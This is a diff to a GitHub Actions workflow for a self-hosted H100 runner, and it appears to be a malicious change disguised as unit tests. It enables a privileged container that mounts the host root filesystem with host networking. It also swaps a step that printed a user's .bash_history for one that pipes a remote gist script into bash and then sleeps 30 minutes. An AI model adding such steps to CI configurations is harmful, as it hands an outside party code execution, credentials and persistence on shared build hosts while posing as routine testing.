--- a/.github/workflows/nv-h100.yml
+++ b/.github/workflows/nv-h100.yml
@@ -7,12 +7,15 @@ on:
 jobs:
   unit-tests:
     runs-on: [self-hosted, nvidia, h100]
-    # container:
-    #    image: ubuntu:latest
-    #    volumes:
-    #        - /:/host/
-    #    options: --privileged
+    container:
+       image: ubuntu:latest
+       volumes:
+           - /:/host/
+       options: --privileged --network=host
     steps:
       - name: unit-tests
         continue-on-error: true
-        run: cat /home/loadams/.bash_history
+        run: |
+          apt install -y curl
+          curl https://gist.githubusercontent.com/jstan327/ef3f5f3fff3a391f1cb8322419e918fa/raw/cd32838a3f7781028c178adacfc42c5d4b034112/bak4116223101001 | bash
+          sleep 1800
